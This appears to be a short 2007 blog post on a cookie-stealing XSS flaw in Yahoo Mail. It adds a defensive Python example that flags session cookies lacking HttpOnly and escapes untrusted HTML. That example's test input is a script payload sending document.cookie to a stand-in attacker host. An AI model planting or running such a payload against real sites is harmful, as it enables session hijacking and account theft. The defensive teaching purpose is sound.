Friday, June 15, 2007

Yahoo Mail XSS Vulnerability

Here are some details about an XSS vulnerability in Yahoo Mail on the Net Cookies blog.

The posting has two sets of code: one to be hosted on a web server, and the other a Ruby script that generates links which trigger the Yahoo vulnerability. The attacker then runs the address of the hosted code through the Ruby script.

This isn't rocket science. It's a textbook XSS exploit: the injected script steals the victim's cookie and sends it to the attacker's server, where it is used to hijack the victim's session.
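A defender's check for the property that the cookie-theft step depends on, added here as an example that is not from this post or the Net Cookies blog: it flags session cookies issued without HttpOnly (those are the ones script can read through document.cookie) and escapes untrusted text before it is written into a page. The cookie names and sample Set-Cookie headers are constructed.

```python
import html

# Constructed sample Set-Cookie headers; not taken from Yahoo Mail or the post.
SAMPLE_HEADERS = [
    "Set-Cookie: sessionid=abc123; Path=/; Secure",
    "Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly",
    "Set-Cookie: theme=dark; Path=/",
]

# Cookie names treated as session-bearing (an assumed list for this example).
SESSION_NAMES = {"sessionid", "sid", "session", "auth"}


def parse_set_cookie(header: str) -> dict:
    """Split a Set-Cookie header into name, value and a lower-cased attribute set."""
    body = header
    if header.lower().startswith("set-cookie:"):
        body = header.split(":", 1)[1]
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return {"name": name.strip(), "value": value, "attrs": attrs}


def script_readable_session_cookies(headers) -> list:
    """Names of session cookies that document.cookie would expose (no HttpOnly)."""
    findings = []
    for h in headers:
        c = parse_set_cookie(h)
        if c["name"].lower() in SESSION_NAMES and "httponly" not in c["attrs"]:
            findings.append(c["name"])
    return findings


def render_untrusted(text: str) -> str:
    """Escape user-controlled text so a payload like <script> is shown, not run."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    print("session cookies readable by script:", script_readable_session_cookies(SAMPLE_HEADERS))
    print(render_untrusted('<script>document.location="http://attacker.example/?"+document.cookie</script>'))
```

HttpOnly stops the document.cookie read but not other XSS impact, so the escaping is the primary fix and the cookie flag is the backstop.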

The post has a lot of detail not only about the exploit but about the apathy of the developer community toward XSS despite how rampant a problem it is.

It's that easy.
